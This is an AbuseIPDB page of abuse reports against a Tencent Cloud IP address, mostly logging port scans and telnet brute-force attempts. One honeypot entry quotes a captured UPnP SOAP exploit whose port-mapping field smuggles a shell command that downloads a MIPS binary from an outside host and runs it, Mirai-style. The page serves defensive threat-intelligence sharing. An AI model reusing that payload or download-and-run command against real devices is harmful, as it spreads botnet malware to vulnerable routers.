JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 43.139.53.45

43.139.53.45 was found in our database!

This IP was reported 121 times. Confidence of Abuse is 100%: ?

100%

ISP	Tencent Cloud Computing (Beijing) Co., Ltd
Usage Type	Data Center/Web Hosting/Transit
ASN	AS45090
Domain Name	tencentcloud.com
Country	🇨🇳 China
City	Guangzhou, Guangdong

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 43.139.53.45

Whois 43.139.53.45

IP Abuse Reports for 43.139.53.45:

This IP address has been reported a total of 121 times from 65 distinct sources. 43.139.53.45 was first reported on March 2nd 2026, and the most recent report was 10 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇬🇧 gbzret4d	2026-06-20 09:27:52 (10 hours ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot
🇳🇱 ByeByte API	2026-06-20 08:12:07 (12 hours ago)	byebyte.space auth: TCP packet to port 52869 (high-risk service) at 2026-06-20T08:12:07Z. Source por ... show more byebyte.space auth: TCP packet to port 52869 (high-risk service) at 2026-06-20T08:12:07Z. Source port 32486. TCP flags: SYN. Packet: 40B, TTL 43, window 20205, IP id 33435. Single packet, dropped at firewall. p0f: 21 hops. show less	Port Scan
🇫🇷 EDSL	2026-06-20 08:05:21 (12 hours ago)	[SRV-VPN1] Blocked by SysWarden Firewall (Port Scan / Probing)	Port Scan
🇧🇷 diego	2026-06-20 06:30:15 (13 hours ago)	[rede-164-29] 06/20/2026-03:30:15.238838, 43.139.53.45, Protocol: 6, ET CINS Active Threat Intellige ... show more [rede-164-29] 06/20/2026-03:30:15.238838, 43.139.53.45, Protocol: 6, ET CINS Active Threat Intelligence Poor Reputation IP group 57 show less	Hacking
🇸🇪 donarev419	2026-06-20 04:26:19 (15 hours ago)	Port scan detected on port 23 (connection without data transfer)	Port Scan
🇧🇷 diego	2026-06-20 02:49:32 (17 hours ago)	[rede-164-29] 06/19/2026-23:49:32.398443, 43.139.53.45, Protocol: 6, ET CINS Active Threat Intellige ... show more [rede-164-29] 06/19/2026-23:49:32.398443, 43.139.53.45, Protocol: 6, ET CINS Active Threat Intelligence Poor Reputation IP group 57 show less	Hacking
🇳🇱 rmvanderspek	2026-06-20 02:40:00 (17 hours ago)	Telnet Brute-force (IoT Botnet scan) detected.	Brute-Force IoT Targeted
🇩🇪 anycast_ac	2026-06-20 02:22:47 (17 hours ago)	[mirai-detector honeypot] Inbound attack against our honeypot on tcp/23 (telnet). Tried credentials: ... show more [mirai-detector honeypot] Inbound attack against our honeypot on tcp/23 (telnet). Tried credentials: b'\x05\x03\x06\x06\x19\x04\x02':b'\x05\x03\x06\x06\x19\x04\x02' Commands captured: $ enable $ system $ shell $ sh $ /bin/busybox IZ1H9 show less	DDoS Attack IoT Targeted Brute-Force
🇬🇧 andypiper	2026-06-20 01:01:20 (19 hours ago)	CrowdSec ban for AbuseIPDB Top List	Brute-Force Web App Attack
🇳🇱 COMPLEX	2026-06-20 00:14:41 (20 hours ago)	Unsolicited TCP traffic \| Action: DROP \| Port 52869	Brute-Force
🇺🇸 RAP	2026-06-20 00:12:37 (20 hours ago)	2026-06-20 00:12:37 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇩🇪 iNetWorker	2026-06-20 00:10:35 (20 hours ago)	firewall-block, port(s): 23/tcp	Port Scan
🇵🇱 nfsec.pl	2026-06-19 23:50:38 (20 hours ago)	Detected: TCP scan on port: 23 with flags: SYN	Port Scan
🇦🇹 urnilxfgbez	2026-06-19 22:45:00 (21 hours ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇩🇪 EnthecSolutions	2026-06-19 22:00:55 (22 hours ago)	Detected by Enthec Solutions. \| Attempts: 54 in 24h \| Target port: 2323	Port Scan Hacking

Showing 1 to 15 of 121 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇹🇭 147.50.231.135

🇺🇸 3.85.47.95

🇺🇸 73.245.100.202

🇺🇸 44.44.44.44

🇺🇸 24.142.170.231

🇺🇸 20.9.17.155

🇮🇩 2620:171:e7:f0::247

🇧🇷 170.0.62.165

🇨🇳 120.48.14.72

🇩🇪 84.55.2.163

🇨🇳 47.109.91.215

🇧🇪 198.235.24.201

🇧🇷 177.124.225.234

🇷🇴 80.94.92.184

🇯🇵 79.127.129.218

🇺🇸 20.163.3.80

🇲🇽 187.141.71.166

🇫🇮 94.183.234.128

🇨🇳 123.191.145.198

🇨🇳 115.60.186.163